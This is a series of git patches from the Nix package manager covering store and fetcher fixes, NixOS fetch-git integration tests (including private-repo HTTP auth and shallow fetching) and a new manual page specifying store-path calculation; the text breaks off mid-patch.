+++ b/src/libutil/serialise.hh @@ -153,7 +153,7 @@ struct FdSource : BufferedSource { int fd; size_t read = 0; - std::string endOfFileError{"unexpected end-of-file"}; + BackedStringView endOfFileError{"unexpected end-of-file"}; FdSource() : fd(-1) { } FdSource(int fd) : fd(fd) { } From ab786e22f16eed0d95123d5698eb71079c312584 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 18 Jan 2024 15:29:54 +0100 Subject: [PATCH 296/654] Show what goal is waiting for a build slot --- src/libstore/build/worker.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc index 974a9f510..d57e22393 100644 --- a/src/libstore/build/worker.cc +++ b/src/libstore/build/worker.cc @@ -251,7 +251,7 @@ void Worker::childTerminated(Goal * goal, bool wakeSleepers) void Worker::waitForBuildSlot(GoalPtr goal) { - debug("wait for build slot"); + goal->trace("wait for build slot"); bool isSubstitutionGoal = goal->jobCategory() == JobCategory::Substitution; if ((!isSubstitutionGoal && getNrLocalBuilds() < settings.maxBuildJobs) || (isSubstitutionGoal && getNrSubstitutions() < settings.maxSubstitutionJobs)) From a18d8d688a826ff535b3eeff289ef51db33a413b Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 18 Jan 2024 17:01:45 +0100 Subject: [PATCH 297/654] LocalStore::addToStore(): Ignore exceptions from parseDump() In the "discard" case (i.e. when the store path already exists locally), when we call parseDump() from a Finally and it throws an exception (e.g. if the download of the NAR fails), Nix crashes: terminate called after throwing an instance of 'nix::SubstituteGone' what(): error: file 'nar/06br3254rx4gz4cvjzxlv028jrx80zg5i4jr62vjmn416dqihgr7.nar.xz' does not exist in binary cache 'http://localhost' Aborted (core dumped) --- src/libstore/local-store.cc | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 5a399c8be..07068f8f8 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -1049,7 +1049,11 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, Finally cleanup = [&]() { if (!narRead) { NullParseSink sink; - parseDump(sink, source); + try { + parseDump(sink, source); + } catch (...) { + ignoreException(); + } } }; From dca0a802405be9798e12ad8be2ec6d227d9a2fa2 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 18 Jan 2024 17:16:34 +0100 Subject: [PATCH 298/654] copyStorePath(): Bail out early if the store path already exists In rare cases (e.g. when using allowSubstitutes = false), it's possible that we simultaneously have a DerivationGoal *and* a SubstitutionGoal building the same path. So if a DerivationGoal already built the path while the SubstitutionGoal was waiting for a download slot, it saves us a superfluous download to exit early. --- src/libstore/store-api.cc | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 0c37ecd30..9cb187e66 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -981,6 +981,11 @@ void copyStorePath( RepairFlag repair, CheckSigsFlag checkSigs) { + /* Bail out early (before starting a download from srcStore) if + dstStore already has this path. */ + if (!repair && dstStore.isValidPath(storePath)) + return; + auto srcUri = srcStore.getUri(); auto dstUri = dstStore.getUri(); auto storePathS = srcStore.printStorePath(storePath); From fd41979d7857f6984b4b7571706a45b16f9c0a5d Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 13:12:59 +0100 Subject: [PATCH 299/654] tests/nixos/fetch-git: Factor out gitea repo module --- .../fetch-git/testsupport/gitea-repo.nix | 51 +++++++++++++++++++ tests/nixos/fetch-git/testsupport/gitea.nix | 2 + tests/nixos/fetch-git/testsupport/setup.nix | 44 +++++----------- 3 files changed, 65 insertions(+), 32 deletions(-) create mode 100644 tests/nixos/fetch-git/testsupport/gitea-repo.nix diff --git a/tests/nixos/fetch-git/testsupport/gitea-repo.nix b/tests/nixos/fetch-git/testsupport/gitea-repo.nix new file mode 100644 index 000000000..916552bb2 --- /dev/null +++ b/tests/nixos/fetch-git/testsupport/gitea-repo.nix @@ -0,0 +1,51 @@ +{ lib, ... }: +let + inherit (lib) mkOption types; + + testCaseExtension = { config, ... }: { + setupScript = '' + repo = Repo("${config.name}") + ''; + }; +in +{ + options = { + testCases = mkOption { + type = types.listOf (types.submodule testCaseExtension); + }; + }; + config = { + setupScript = '' + class Repo: + """ + A class to create a git repository on the gitea server and locally. + """ + def __init__(self, name): + self.name = name + self.path = "/tmp/repos/" + name + self.remote = "http://gitea:3000/test/" + name + self.remote_ssh = "ssh://gitea/root/" + name + self.git = f"git -C {self.path}" + self.create() + + def create(self): + # create ssh remote repo + gitea.succeed(f""" + git init --bare -b main /root/{self.name} + """) + # create http remote repo + gitea.succeed(f""" + curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ + -H 'Accept: application/json' -H 'Content-Type: application/json' \ + -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} + """) + # setup git remotes on client + client.succeed(f""" + mkdir -p {self.path} \ + && git init -b main {self.path} \ + && {self.git} remote add origin {self.remote} \ + && {self.git} remote add origin-ssh root@gitea:{self.name} + """) + ''; + }; +} \ No newline at end of file diff --git a/tests/nixos/fetch-git/testsupport/gitea.nix b/tests/nixos/fetch-git/testsupport/gitea.nix index 2ea23961e..cf87bb466 100644 --- a/tests/nixos/fetch-git/testsupport/gitea.nix +++ b/tests/nixos/fetch-git/testsupport/gitea.nix @@ -15,6 +15,7 @@ in { imports = [ ../testsupport/setup.nix + ../testsupport/gitea-repo.nix ]; nodes = { gitea = { pkgs, ... }: { @@ -96,5 +97,6 @@ in { client.succeed(""" ssh root@gitea true """) + ''; } diff --git a/tests/nixos/fetch-git/testsupport/setup.nix b/tests/nixos/fetch-git/testsupport/setup.nix index 8fc8e2e7c..a81d5614b 100644 --- a/tests/nixos/fetch-git/testsupport/setup.nix +++ b/tests/nixos/fetch-git/testsupport/setup.nix @@ -12,7 +12,10 @@ let ### TEST ${testCase.name}: ${testCase.description} ### with subtest("${testCase.description}"): - repo = Repo("${testCase.name}") + # Setup + ${indent testCase.setupScript} + + # Test ${indent testCase.script} ''; in @@ -47,12 +50,19 @@ in A description of the test case. ''; }; + options.setupScript = mkOption { + type = types.lines; + description = '' + Python code that runs before the test case. + ''; + default = ""; + }; options.script = mkOption { type = types.lines; description = '' Python code that runs the test. - Variables defined by `setupScript` will be available here. + Variables defined by the global `setupScript`, as well as `testCases.*.setupScript` will be available here. ''; }; }); @@ -67,36 +77,6 @@ in nix.settings.experimental-features = ["nix-command" "flakes"]; }; setupScript = '' - class Repo: - """ - A class to create a git repository on the gitea server and locally. - """ - def __init__(self, name): - self.name = name - self.path = "/tmp/repos/" + name - self.remote = "http://gitea:3000/test/" + name - self.remote_ssh = "ssh://gitea/root/" + name - self.git = f"git -C {self.path}" - self.create() - - def create(self): - # create ssh remote repo - gitea.succeed(f""" - git init --bare -b main /root/{self.name} - """) - # create http remote repo - gitea.succeed(f""" - curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ - -H 'Accept: application/json' -H 'Content-Type: application/json' \ - -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} - """) - # setup git remotes on client - client.succeed(f""" - mkdir -p {self.path} \ - && git init -b main {self.path} \ - && {self.git} remote add origin {self.remote} \ - && {self.git} remote add origin-ssh root@gitea:{self.name} - """) ''; testScript = '' start_all(); From 94eba0ebbbadfa48a4c1253cb94070a41310fae2 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 13:42:41 +0100 Subject: [PATCH 300/654] tests/nixos/fetch-git: Memoize -> save Memoization is for thunk-like behavior whereas this is executed eagerly. --- tests/nixos/fetch-git/test-cases/http-simple/default.nix | 2 +- tests/nixos/fetch-git/test-cases/ssh-simple/default.nix | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/tests/nixos/fetch-git/test-cases/http-simple/default.nix b/tests/nixos/fetch-git/test-cases/http-simple/default.nix index 1bd5bbba2..333ee45fd 100644 --- a/tests/nixos/fetch-git/test-cases/http-simple/default.nix +++ b/tests/nixos/fetch-git/test-cases/http-simple/default.nix @@ -8,7 +8,7 @@ && {repo.git} commit -m 'commit1' """) - # memoize the revision + # save the revision rev1 = client.succeed(f""" {repo.git} rev-parse HEAD """).strip() diff --git a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix index 0e4494ae0..f2deca141 100644 --- a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix +++ b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix @@ -8,7 +8,7 @@ && {repo.git} commit -m 'commit1' """) - # memoize the revision + # save the revision rev1 = client.succeed(f""" {repo.git} rev-parse HEAD """).strip() From 12541704052849d4160a13f7bbd873b40f19a3f9 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 20:56:33 +0100 Subject: [PATCH 301/654] tests/nixos/fetch-git: Make the store paths unique --- tests/nixos/fetch-git/test-cases/http-simple/default.nix | 6 ++++-- tests/nixos/fetch-git/test-cases/ssh-simple/default.nix | 6 ++++-- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/tests/nixos/fetch-git/test-cases/http-simple/default.nix b/tests/nixos/fetch-git/test-cases/http-simple/default.nix index 333ee45fd..dcab8067e 100644 --- a/tests/nixos/fetch-git/test-cases/http-simple/default.nix +++ b/tests/nixos/fetch-git/test-cases/http-simple/default.nix @@ -1,10 +1,12 @@ +{ config, ... }: { description = "can fetch a git repo via http"; script = '' # add a file to the repo client.succeed(f""" - echo chiang-mai > {repo.path}/thailand \ - && {repo.git} add thailand \ + echo ${config.name /* to make the git tree and store path unique */} > {repo.path}/test-case \ + && echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add test-case thailand \ && {repo.git} commit -m 'commit1' """) diff --git a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix index f2deca141..f5fba1698 100644 --- a/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix +++ b/tests/nixos/fetch-git/test-cases/ssh-simple/default.nix @@ -1,10 +1,12 @@ +{ config, ... }: { description = "can fetch a git repo via ssh"; script = '' # add a file to the repo client.succeed(f""" - echo chiang-mai > {repo.path}/thailand \ - && {repo.git} add thailand \ + echo ${config.name /* to make the git tree and store path unique */} > {repo.path}/test-case \ + && echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add test-case thailand \ && {repo.git} commit -m 'commit1' """) From ed975e953c30c335f8403352acc785323a5a925c Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 20:59:24 +0100 Subject: [PATCH 302/654] tests/nixos/fetch-git: Testsupport for private repos --- .../fetch-git/testsupport/gitea-repo.nix | 36 +++++++++++++++---- 1 file changed, 30 insertions(+), 6 deletions(-) diff --git a/tests/nixos/fetch-git/testsupport/gitea-repo.nix b/tests/nixos/fetch-git/testsupport/gitea-repo.nix index 916552bb2..a3ad65ca4 100644 --- a/tests/nixos/fetch-git/testsupport/gitea-repo.nix +++ b/tests/nixos/fetch-git/testsupport/gitea-repo.nix @@ -1,11 +1,31 @@ { lib, ... }: let - inherit (lib) mkOption types; + inherit (lib) + mkIf + mkOption + types + ; + + boolPyLiteral = b: if b then "True" else "False"; testCaseExtension = { config, ... }: { - setupScript = '' - repo = Repo("${config.name}") - ''; + options = { + repo.enable = mkOption { + type = types.bool; + default = true; + description = "Whether to provide a repo variable - automatic repo creation."; + }; + repo.private = mkOption { + type = types.bool; + default = false; + description = "Whether the repo should be private."; + }; + }; + config = mkIf config.repo.enable { + setupScript = '' + repo = Repo("${config.name}", private=${boolPyLiteral config.repo.private}) + ''; + }; }; in { @@ -16,16 +36,20 @@ in }; config = { setupScript = '' + def boolToJSON(b): + return "true" if b else "false" + class Repo: """ A class to create a git repository on the gitea server and locally. """ - def __init__(self, name): + def __init__(self, name, private=False): self.name = name self.path = "/tmp/repos/" + name self.remote = "http://gitea:3000/test/" + name self.remote_ssh = "ssh://gitea/root/" + name self.git = f"git -C {self.path}" + self.private = private self.create() def create(self): @@ -37,7 +61,7 @@ in gitea.succeed(f""" curl --fail -X POST http://{gitea_admin}:{gitea_admin_password}@gitea:3000/api/v1/user/repos \ -H 'Accept: application/json' -H 'Content-Type: application/json' \ - -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main"}}' )} + -d {shlex.quote( f'{{"name":"{self.name}", "default_branch": "main", "private": {boolToJSON(self.private)}}}' )} """) # setup git remotes on client client.succeed(f""" From 76a50b3a69dd7202fa4c68ca8d12fde152e6341a Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 22:25:30 +0100 Subject: [PATCH 303/654] doc: GitRepoImpl::path --- src/libfetchers/git-utils.cc | 1 + 1 file changed, 1 insertion(+) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 6726407b5..f34329fab 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -139,6 +139,7 @@ T peelObject(git_repository * repo, git_object * obj, git_object_t type) struct GitRepoImpl : GitRepo, std::enable_shared_from_this { + /** Location of the repository on disk. */ CanonPath path; Repository repo; From 8d422c2fef4309b4b7de8e2f909957775a9ec3ef Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 22:26:24 +0100 Subject: [PATCH 304/654] Revert libgit2 fetching libgit2 is not capable of using git-credentials helpers yet. This prevents private repositories from being used. Based on code that was replaced in https://github.com/NixOS/nix/pull/9240 (Introduce libgit2); hence: Co-authored-by: Eelco Dolstra --- src/libfetchers/git-utils.cc | 31 ++++++++++++------------------- 1 file changed, 12 insertions(+), 19 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index f34329fab..911c16c4b 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -383,27 +383,20 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this { Activity act(*logger, lvlTalkative, actFetchTree, fmt("fetching Git repository '%s'", url)); - Remote remote; + // TODO: implement git-credential helper support (preferably via libgit2, which as of 2024-01 does not support that) + // then use code that was removed in this commit (see blame) - if (git_remote_create_anonymous(Setter(remote), *this, url.c_str())) - throw Error("cannot create Git remote '%s': %s", url, git_error_last()->message); + auto dir = this->path; - char * refspecs[] = {(char *) refspec.c_str()}; - git_strarray refspecs2 { - .strings = refspecs, - .count = 1 - }; - - git_fetch_options opts = GIT_FETCH_OPTIONS_INIT; - // FIXME: for some reason, shallow fetching over ssh barfs - // with "could not read from remote repository". - opts.depth = shallow && parseURL(url).scheme != "ssh" ? 1 : GIT_FETCH_DEPTH_FULL; - opts.callbacks.payload = &act; - opts.callbacks.sideband_progress = sidebandProgressCallback; - opts.callbacks.transfer_progress = transferProgressCallback; - - if (git_remote_fetch(remote.get(), &refspecs2, &opts, nullptr)) - throw Error("fetching '%s' from '%s': %s", refspec, url, git_error_last()->message); + runProgram(RunOptions { + .program = "git", + .searchPath = true, + // FIXME: git stderr messes up our progress indicator, so + // we're using --quiet for now. Should process its stderr. + .args = { "-C", path.abs(), "fetch", "--quiet", "--force", "--", url, refspec }, + .input = {}, + .isInteractive = true + }); } void verifyCommit( From 346d513d86491f2040735d22ba49cb0d701edb70 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Thu, 18 Jan 2024 22:34:38 +0100 Subject: [PATCH 305/654] tests/nixos/fetch-git: Add http-auth test --- .../test-cases/http-auth/default.nix | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 tests/nixos/fetch-git/test-cases/http-auth/default.nix diff --git a/tests/nixos/fetch-git/test-cases/http-auth/default.nix b/tests/nixos/fetch-git/test-cases/http-auth/default.nix new file mode 100644 index 000000000..d483d54fb --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/http-auth/default.nix @@ -0,0 +1,40 @@ +{ config, ... }: +{ + description = "can fetch a private git repo via http"; + repo.private = true; + script = '' + # add a file to the repo + client.succeed(f""" + echo ${config.name /* to make the git tree and store path unique */} > {repo.path}/test-case \ + && echo lutyabrook > {repo.path}/new-york-state \ + && {repo.git} add test-case new-york-state \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin main + """) + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).outPath" + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/new-york-state + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr "(builtins.fetchGit {repo.remote}).rev" + """).strip() + assert rev1 == rev1_fetched, f"rev1: {rev1} != rev1_fetched: {rev1_fetched}" + ''; +} From 14f470ec4e9d481698b97ea2dae101693fbaca95 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 19 Jan 2024 00:32:30 +0100 Subject: [PATCH 306/654] doc/hacking.md: Hint short option `make -e` Co-authored-by: Valentin Gagarin --- doc/manual/src/contributing/hacking.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index fe91787a3..9a7623dc9 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -115,7 +115,7 @@ You can also build Nix for one of the [supported platforms](#platforms). You may need `profiledir=$out/etc/profile.d` and `sysconfdir=$out/etc` to run `make install`. -Run `make` with [`--environment-overrides`](https://www.gnu.org/software/make/manual/make.html#index-_002de) to allow environment variables to override `Makefile` variables: +Run `make` with [`-e` / `--environment-overrides`](https://www.gnu.org/software/make/manual/make.html#index-_002de) to allow environment variables to override `Makefile` variables: - `ENABLE_BUILD=yes` to enable building the C++ code. - `ENABLE_DOC_GEN=yes` to enable building the documentation (manual, man pages, etc.). From a34ec0bd123619277e5682b7f6f8da41166e3eab Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 4 Nov 2023 20:10:55 -0400 Subject: [PATCH 307/654] Include store path exact spec in the docs This is niche, but deserves to be in the manual because it is describing behavior visible to the outside world, not mere implementation details. --- doc/manual/src/SUMMARY.md.in | 1 + doc/manual/src/protocols/store-path.md | 104 +++++++++++++++++++++++++ src/libstore/store-api.cc | 84 ++------------------ 3 files changed, 111 insertions(+), 78 deletions(-) create mode 100644 doc/manual/src/protocols/store-path.md diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index c67ddc6cb..e6390c60a 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -106,6 +106,7 @@ - [Architecture and Design](architecture/architecture.md) - [Protocols](protocols/index.md) - [Serving Tarball Flakes](protocols/tarball-fetcher.md) + - [Exact Store Path Specification](protocols/store-path.md) - [Derivation "ATerm" file format](protocols/derivation-aterm.md) - [Glossary](glossary.md) - [Contributing](contributing/index.md) diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md new file mode 100644 index 000000000..d1c35b05e --- /dev/null +++ b/doc/manual/src/protocols/store-path.md @@ -0,0 +1,104 @@ +# Complete Store Path Calculation + +This is the complete specification for how store paths are calculated. + +Regular users do *not* need to know this information --- store paths can be treated as black boxes computed from the properties of the store objects they refer to. +But for those interested in exactly how Nix works, e.g. if they are reimplementing it, this information can be useful. + +```bnf + ::= /- +``` +where + +- `` = base-32 representation of the first 160 bits of a [SHA-256] hash of `
`
+
+  Th is :the hash part of the store name
+
+- `
` = the string `:sha256:::`;
+
+  Note that it includes the location of the store as well as the name to make sure that changes to either of those are reflected in the hash
+  (e.g. you won't get `/nix/store/-name1` and `/nix/store/-name2`, or `/gnu/store/-name1`, with equal hash parts).
+
+- `` = the name of the store object.
+
+- `` = the [store directory](@docroot@/store/store-path.md#store-directory)
+
+- `` = one of:
+
+  - ```bnf
+    text:::...
+    ```
+
+    for encoded derivations written to the store.
+    ` ... ` are the store paths referenced by this path.
+    Those are encoded in the form described by ``.
+
+  - ```bnf
+    source:::...::self
+    ```
+
+    For paths copied to the store and hashed via a [Nix Archive (NAR)] and [SHA-256][sha-256].
+    Just like in the text case, we can have the store objects referenced by their paths.
+    Additionally, we can have an optional `:self` label to denote self reference.
+
+  - ```bnf
+    output:
+    ```
+
+    For either the outputs built from derivations,
+    paths copied to the store hashed that area single file hashed directly, or the via a hash algorithm other than [SHA-256][sha-256].
+    (in that case "source" is used; it's silly, but it's done that way for compatibility).
+
+    `` is the name of the output (usually, "out").
+    For content-addressed store objects, ``, is always "out".
+
+- `` = base-16 representation of a SHA-256 hash of ``
+
+- `` = one of the following based on ``:
+
+  - if `` = `text:...`:
+
+    the string written to the resulting store path.
+
+  - if `` = `source:...`:
+
+    the the hash of the [Nix Archive (NAR)] serialization of the [file system object](@docroot@/store/file-system-object.md) of the store object.
+
+  - if `` = `output:`:
+
+    - For input-addressed derivation outputs:
+
+      the [ATerm](@docroot@/protocols/derivation-aterm.md) serialization of the derivation modulo fixed output derivations.
+
+    - For content-addressed store paths:
+
+      the string `fixed:out:::`, where
+
+      - `` = one of:
+
+        - `r:` hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
+
+        - `` (empty string) for hashes of the flat (single file) serialization
+
+      - `` = `md5`, `sha1` or `sha256`
+
+      - `` = base-16 representation of the path or flat hash of the contents of the path (or expected contents of the path for fixed-output derivations).
+
+      Note that `` = `out`, regardless of the name part of the store path.
+      Also note that NAR + SHA-256 must not use this case, and instead must use the `` = `source:...` case.
+
+[Nix Archive (NAR)]: @docroot@/glossary.md#gloss-NAR
+[sha-256]: https://en.m.wikipedia.org/wiki/SHA-256
+
+## Historical Note
+
+The `` = `source:...` and `` = `output:out` grammars technically overlap, in that both can represent data hashed by its SHA-256 NAR serialization.
+
+The original reason for this way of computing names was to prevent name collisions (for security).
+For instance, the thinking was that it shouldn't be feasible to come up with a derivation whose output path collides with the path for a copied source.
+The former would have an `` starting with `output:out:`, while the latter would have an `` starting with `source:`.
+
+Since `64519cfd657d024ae6e2bb74cb21ad21b886fd2a` (2008), however, it was decided that separting derivation-produced vs manually-hashed content-addressed data like this was not useful.
+Now, data this is to be SHA-256 + NAR-serialization content-addressed always uses the `source:...` construction, regardless of how it was produced (manually or by derivation).
+This allows freely switching between using [fixed-output derivations](@docroot@/glossary.md#gloss-fixed-output-derivation) for fetching, and fetching out-of-band and then manually adding.
+It also removes the ambiguity from the grammar.
diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc
index 0c37ecd30..dcfe5991d 100644
--- a/src/libstore/store-api.cc
+++ b/src/libstore/store-api.cc
@@ -65,85 +65,13 @@ StorePath Store::followLinksToStorePath(std::string_view path) const
 }
 
 
-/* Store paths have the following form:
+/*
+The exact specification of store paths is in `protocols/store-path.md`
+in the Nix manual. These few functions implement that specification.
 
-    = /-
-
-   where
-
-    = the location of the Nix store, usually /nix/store
-
-    = a human readable name for the path, typically obtained
-     from the name attribute of the derivation, or the name of the
-     source file from which the store path is created.  For derivation
-     outputs other than the default "out" output, the string "-"
-     is suffixed to .
-
-    = base-32 representation of the first 160 bits of a SHA-256
-     hash of ; the hash part of the store name
-
-    = the string ":sha256:

::"; - note that it includes the location of the store as well as the - name to make sure that changes to either of those are reflected - in the hash (e.g. you won't get /nix/store/-name1 and - /nix/store/-name2 with equal hash parts). - - = one of: - "text:::..." - for plain text files written to the store using - addTextToStore(); ... are the store paths referenced - by this path, in the form described by - "source:::...::self" - for paths copied to the store using addToStore() when recursive - = true and hashAlgo = "sha256". Just like in the text case, we - can have the store paths referenced by the path. - Additionally, we can have an optional :self label to denote self - reference. - "output:" - for either the outputs created by derivations, OR paths copied - to the store using addToStore() with recursive != true or - hashAlgo != "sha256" (in that case "source" is used; it's - silly, but it's done that way for compatibility). is the - name of the output (usually, "out"). - -

= base-16 representation of a SHA-256 hash of - - = - if = "text:...": - the string written to the resulting store path - if = "source:...": - the serialisation of the path from which this store path is - copied, as returned by hashPath() - if = "output:": - for non-fixed derivation outputs: - the derivation (see hashDerivationModulo() in - primops.cc) - for paths copied by addToStore() or produced by fixed-output - derivations: - the string "fixed:out:::", where - = "r:" for recursive (path) hashes, or "" for flat - (file) hashes - = "md5", "sha1" or "sha256" - = base-16 representation of the path or flat hash of - the contents of the path (or expected contents of the - path for fixed-output derivations) - - Note that since an output derivation has always type output, while - something added by addToStore can have type output or source depending - on the hash, this means that the same input can be hashed differently - if added to the store via addToStore or via a derivation, in the sha256 - recursive case. - - It would have been nicer to handle fixed-output derivations under - "source", e.g. have something like "source:", but we're - stuck with this for now... - - The main reason for this way of computing names is to prevent name - collisions (for security). For instance, it shouldn't be feasible - to come up with a derivation whose output path collides with the - path for a copied source. The former would have a starting with - "output:out:", while the latter would have a starting with - "source:". +If changes do these functions go behind mere implementation changes but +also update the user-visible behavior, please update the specification +to match. */ From 28d7db249ace91c10a9ad6cb6d11a6c2109929fb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Fri, 19 Jan 2024 10:10:00 +0100 Subject: [PATCH 308/654] Remove a nonsensical shorthand flag in `nix store add` `-n` was an alias for `--mode`, but that seems to just be a copy-paste error as it doesn't make sense. `--mode` probably doesn't need a shorthand flag at all, so remove it. Noticed in https://github.com/NixOS/nix/pull/9809#issuecomment-1899890555 --- src/nix/add-to-store.cc | 1 - 1 file changed, 1 deletion(-) diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index 64a43ecfa..171848002 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -38,7 +38,6 @@ struct CmdAddToStore : MixDryRun, StoreCommand addFlag({ .longName = "mode", - .shortName = 'n', .description = R"( How to compute the hash of the input. One of: From bc00fa46472c56ccfddc2d6e81453be537d2e051 Mon Sep 17 00:00:00 2001 From: DavHau Date: Fri, 19 Jan 2024 15:59:15 +0700 Subject: [PATCH 309/654] fetchTree/fetchGit: re-enable shallow fetching Add several tests for git fetching: - shallow-cache-separation: can fetch the same repo shallowly and non-shallowly - shallow-ignore-ref: ensure that ref gets ignored when shallow=true is set - ssh-shallow: can fetch a git repo via ssh using shallow=1 --- src/libfetchers/git-utils.cc | 9 ++- src/libfetchers/git.cc | 16 ++++-- .../shallow-cache-separation/default.nix | 57 +++++++++++++++++++ .../test-cases/shallow-ignore-ref/default.nix | 40 +++++++++++++ .../test-cases/ssh-shallow/default.nix | 52 +++++++++++++++++ .../fetch-git/testsupport/gitea-repo.nix | 2 +- 6 files changed, 168 insertions(+), 8 deletions(-) create mode 100644 tests/nixos/fetch-git/test-cases/shallow-cache-separation/default.nix create mode 100644 tests/nixos/fetch-git/test-cases/shallow-ignore-ref/default.nix create mode 100644 tests/nixos/fetch-git/test-cases/ssh-shallow/default.nix diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 911c16c4b..382a363f0 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -387,13 +387,20 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this // then use code that was removed in this commit (see blame) auto dir = this->path; + Strings gitArgs; + if (shallow) { + gitArgs = { "-C", dir.abs(), "fetch", "--quiet", "--force", "--depth", "1", "--", url, refspec }; + } + else { + gitArgs = { "-C", dir.abs(), "fetch", "--quiet", "--force", "--", url, refspec }; + } runProgram(RunOptions { .program = "git", .searchPath = true, // FIXME: git stderr messes up our progress indicator, so // we're using --quiet for now. Should process its stderr. - .args = { "-C", path.abs(), "fetch", "--quiet", "--force", "--", url, refspec }, + .args = gitArgs, .input = {}, .isInteractive = true }); diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 6ecb7a4ea..f9a1cb1bc 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -50,10 +50,12 @@ bool touchCacheFile(const Path & path, time_t touch_time) return lutimes(path.c_str(), times) == 0; } -Path getCachePath(std::string_view key) +Path getCachePath(std::string_view key, bool shallow) { - return getCacheDir() + "/nix/gitv3/" + - hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Nix32, false); + return getCacheDir() + + "/nix/gitv3/" + + hashString(HashAlgorithm::SHA256, key).to_string(HashFormat::Nix32, false) + + (shallow ? "-shallow" : ""); } // Returns the name of the HEAD branch. @@ -92,7 +94,8 @@ std::optional readHead(const Path & path) // Persist the HEAD ref from the remote repo in the local cached repo. bool storeCachedHead(const std::string & actualUrl, const std::string & headRef) { - Path cacheDir = getCachePath(actualUrl); + // set shallow=false as HEAD will never be queried for a shallow repo + Path cacheDir = getCachePath(actualUrl, false); try { runProgram("git", true, { "-C", cacheDir, "--git-dir", ".", "symbolic-ref", "--", "HEAD", headRef }); } catch (ExecError &e) { @@ -107,7 +110,8 @@ std::optional readHeadCached(const std::string & actualUrl) { // Create a cache path to store the branch of the HEAD ref. Append something // in front of the URL to prevent collision with the repository itself. - Path cacheDir = getCachePath(actualUrl); + // set shallow=false as HEAD will never be queried for a shallow repo + Path cacheDir = getCachePath(actualUrl, false); Path headRefFile = cacheDir + "/HEAD"; time_t now = time(0); @@ -508,7 +512,7 @@ struct GitInputScheme : InputScheme if (!input.getRev()) input.attrs.insert_or_assign("rev", GitRepo::openRepo(CanonPath(repoDir))->resolveRef(ref).gitRev()); } else { - Path cacheDir = 